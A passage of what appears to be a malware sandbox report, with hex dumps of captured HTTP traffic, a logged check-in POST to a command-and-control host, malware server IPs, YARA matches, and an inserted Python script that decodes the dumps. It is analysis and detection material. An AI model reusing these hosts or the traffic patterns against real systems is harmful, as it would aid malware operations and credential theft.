2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 66 61 30 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 c5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 c1 56 26 40 d8 c9 30 29 74 99 cb e5 a8 0a 17 26 33 98 b4 07 5c 34 fa 2f a0 2c 28 a4 10 fa 11 e6 a8 63 2a 90 25 d2 75 91 d3 25 9d e9 9e f8 73 2b 48 bd 1f aa 74 ab 1f fd 6a 18 dc 08 89 73 f9 96 51 c3 e0 73 92 3b 6f 80 36 f8 37 33 a3 98 3b 05 ed 05 70 b1 17 22 58 4a 63 0a 62 3e 59 20 08 5a 15 a8 44 5b 56 3f cb 00 23 be 42 15 37 07 50 52 f1 ca 16 9e 1d ef 53 2b e5 67 9b 7b 7e 45 f7 ff 8e 19 55 db c4 1d 13 13 bf 1e e3 92 24 08 0f c5 03 b1 cb a1 61 7c de f5 6c b9 19 17 7e 5f af 9a a0 44 c9 a0 c1 b9 dd 7a 0d 40 54 19 e0 28 95 a9 c3 93 f0 96 bc 25 51 e1 9a d4 2e 7c 88 38 c8 48 6b a1 d0 4a 9a 13 fd ec 9e aa 7b ac 97 2f bd 61 0d c0 5d bf 46 34 fd f8 f6 8b 32 6c 79 7c 0a 8d c7 7d fe 0e b4 a8 7e 71 eb 80 f5 1a 68 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 d7 29 2a b9 6e ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 e7 72 3c 27 94 69 b7 9f 33 c9 cc 46 d9 48 15 ac af fb d9 55 1d ad ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b aa 93 58 1e 85 8a 64 b1 57 d4 13 51 8c 60 17 4b 81 8d de 8e 82 05 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 4f c3 cb 49 1c 4c 86 2f 7f 54 ab 1e 22 08 09 ee c3 ce 55 a3 4c ff 87 1f d4 b6 69 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 e6 7d 10 5f 3e cb aa c2 fa 07 99 8a dd a7 7f 74 79 d0 77 43 cc fd 8b 8b e1 ae 7e d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 5f d0 a1 aa 
7a 8f f6 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 66 61 30 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 c5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 c1 56 26 40 d8 c9 30 29 74 99 cb e5 a8 0a 17 26 33 98 b4 07 5c 34 fa 2f a0 2c 28 a4 10 fa 11 e6 a8 63 2a 90 25 d2 75 91 d3 25 9d e9 9e f8 73 2b 48 bd 1f aa 74 ab 1f fd 6a 18 dc 08 89 73 f9 96 51 c3 e0 73 92 3b 6f 80 36 f8 37 33 a3 98 3b 05 ed 05 70 b1 17 22 58 4a 63 0a 62 3e 59 20 08 5a 3b 00 4b 5b 56 3f cb 00 23 be 42 15 37 07 50 52 f1 ca 16 9e 1d ef 53 2b e5 cf 9c 7b 7e 45 f7 ff 8e 19 55 db c4 1d 13 13 bf 1e e3 92 24 08 0f c5 03 b1 cb a1 61 7c de f5 6c b9 19 17 7e 5f af 9a a0 44 c9 a0 c1 b9 dd 7a 0d b0 6f 19 e0 28 95 a9 e6 13 f9 96 bc 25 51 e0 9a d4 2e 7c 88 38 c8 48 6b a1 d0 4a 9a 13 fd ec 9e aa 7b ac 97 2f bd 61 0d c0 5d bf 46 34 fd f8 f6 8b 32 6c 79 7c 0a 8d c7 2d c4 0e b4 a8 7e 71 eb 80 f5 1a 68 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 d7 29 2a b9 6e ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 e7 72 3c 27 94 69 b7 9f 33 c9 cc 46 d9 48 15 ac af fb d9 55 1d ad ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b aa 93 58 1e 85 8a 64 b1 57 d4 13 51 8c 60 17 4b 81 8d de 8e 82 05 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 4f c3 cb 49 1c 4c 86 2f 7f 54 ab 1e 82 b5 0f ee c3 ce 55 a3 4c 2b 8c 1f d4 b6 69 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 e6 7d 10 5f 3e cb aa c2 fa 07 99 8a dd a7 7f 74 79 80 4d 43 cc fd 8b 8b e1 42 71 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 5f d0 a1 aa 
7a 8f f6 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:47:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:47:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:47:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 03 Nov 2022 11:47:18 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 
13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
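Added example (not part of the sandbox report or of any of the detected families' code): a Python triage script for the "HTTP traffic detected" lines above. It turns a line's Data Raw hex dump back into bytes, undoes chunked transfer encoding (marking dumps the report cut short, such as the 0x1ffa0-byte chunks above, as truncated instead of failing), and labels each body as the generic nginx HTML 404 page, a 404 whose chunked body is binary rather than HTML, or a ZIP whose first local file header names its first member (freebl3.dll in the 200 OK response). The header prefixes and the short hex are copied from the report lines; the HTML body is rebuilt from the report's Data Ascii text and re-chunked; the label names, thresholds and the Verdict structure are the example's own. The reading is mine, not the report's: a 404 that carries an encrypted-looking body to a fixed IP is consistent with a SmokeLoader check-in reply, and a ZIP whose first member is freebl3.dll is consistent with the Mozilla/NSS DLL bundle Vidar fetches to decrypt browser credentials; tie each response to the requesting process before relying on either.

```python
"""Triage the "HTTP traffic detected" lines of a sandbox report (added example)."""
import math
import re
import struct
from collections import Counter
from dataclasses import dataclass
from typing import Optional, Tuple

HEX_BYTE = re.compile(r"\b[0-9a-fA-F]{2}\b")


def raw_bytes(report_line: str) -> bytes:
    """Bytes of the 'Data Raw:' dump; the 'Data Ascii:' tail is ignored."""
    dump = report_line.partition("Data Raw:")[2].split("Data Ascii:", 1)[0]
    return bytes(int(h, 16) for h in HEX_BYTE.findall(dump))


def decode_chunked(body: bytes) -> Tuple[bytes, bool]:
    """Undo RFC 7230 chunked encoding; returns (data, truncated).

    Reports cut long dumps short, so a chunk whose declared size exceeds the
    bytes present is returned partially and flagged rather than raising.
    """
    out, pos = bytearray(), 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            return bytes(out), True
        size = int(body[pos:eol].split(b";")[0], 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:                                  # last-chunk
            return bytes(out), False
        chunk = body[pos:pos + size]
        out += chunk
        if len(chunk) < size or body[pos + size:pos + size + 2] != b"\r\n":
            return bytes(out), True
        pos += size + 2


def chunk_encode(data: bytes) -> bytes:
    """Single-chunk encoding, used to rebuild the HTML sample from its text."""
    return b"%x\r\n%s\r\n0\r\n\r\n" % (len(data), data)


def printable_ratio(data: bytes) -> float:
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in data) / len(data) if data else 0.0


def shannon_entropy(data: bytes) -> float:
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def zip_first_entry(data: bytes) -> Optional[str]:
    """Name of the first member if data starts with a ZIP local file header."""
    if len(data) < 30 or data[:4] != b"PK\x03\x04":
        return None
    name_len = struct.unpack_from("<H", data, 26)[0]   # offset 26: file name length
    name = data[30:30 + name_len]
    return name.decode("ascii", "replace") if len(name) == name_len else None


@dataclass
class Verdict:
    status: int
    body_len: int
    truncated: bool
    printable: float
    entropy: float
    label: str
    zip_entry: Optional[str] = None


def triage(report_line: str) -> Verdict:
    status = int(re.search(r"HTTP/1\.[01] (\d{3})", report_line).group(1))
    wire = raw_bytes(report_line)
    if "Transfer-Encoding: chunked" in report_line:
        data, truncated = decode_chunked(wire)
    else:  # Content-Length framing: truncated when the dump is shorter than declared
        m = re.search(r"Content-Length: (\d+)", report_line)
        data, truncated = wire, len(wire) < (int(m.group(1)) if m else len(wire))
    pr, ent, entry = printable_ratio(data), shannon_entropy(data), zip_first_entry(data)
    if entry is not None:
        label = "zip-archive"
    elif status == 404 and pr > 0.9 and b"<html" in data.lower():
        label = "generic-404-page"
    elif status == 404 and pr < 0.5:
        label = "404-with-binary-body"  # error status but non-HTML payload: review
    else:
        label = "other"
    return Verdict(status, len(data), truncated, round(pr, 2), round(ent, 2), label, entry)


# Sample lines: prefixes copied from the report; short hex copied, HTML body rebuilt.
HDR_404 = ("Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx"
           "Date: Thu, 03 Nov 2022 11:46:51 GMTContent-Type: text/html; charset=utf-8"
           "Transfer-Encoding: chunkedConnection: keep-aliveData Raw: ")
LINE_BINARY_404 = HDR_404 + (
    "32 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4c cd 44 9f 05 85 "
    "a2 4e f2 7a a6 64 12 09 78 e3 28 01 7c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 27Uys/~(`:LDNzdx(|0")
HTML_404 = (b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\r\n<html><head>\r\n'
            b"<title>404 Not Found</title>\r\n</head><body>\r\n<h1>Not Found</h1>\r\n"
            b"<p>The requested URL / was not found on this server.</p>\r\n"
            b"<p>Additionally, a 404 Not Found error was encountered while trying to use "
            b"an ErrorDocument to handle the request.</p>\r\n<hr></body></html>")
LINE_HTML_404 = HDR_404 + chunk_encode(HTML_404).hex(" ")
LINE_ZIP_200 = ("Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx"
                "Date: Thu, 03 Nov 2022 11:47:18 GMTContent-Type: application/zipContent-Length: 2685679"
                'Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"'
                "Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 "
                "39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c")

if __name__ == "__main__":
    for line in (LINE_BINARY_404, LINE_HTML_404, LINE_ZIP_200):
        print(triage(line))
```

The chunk sizes in the report check out against the decoded data (0x27 = 39 bytes for the short binary reply, 0x147 = 327 bytes for the HTML page), which is a quick way to confirm a dump is complete before trusting its entropy figure; the 0x1ffa0 chunks are returned truncated because the report only shows their first few hundred bytes.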
Source: unknown TCP traffic detected without corresponding DNS query: 185.174.137.70
Source: unknown HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://ihscr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 127 Host: furubujjul.net
Source: unknown HTTPS traffic detected: 185.220.204.64:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49713 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 11.3.uucbfdt.720000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.700e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.gecbfdt.700e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.uucbfdt.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.gecbfdt.400000.0.unpack, type: UNPACKEDPE
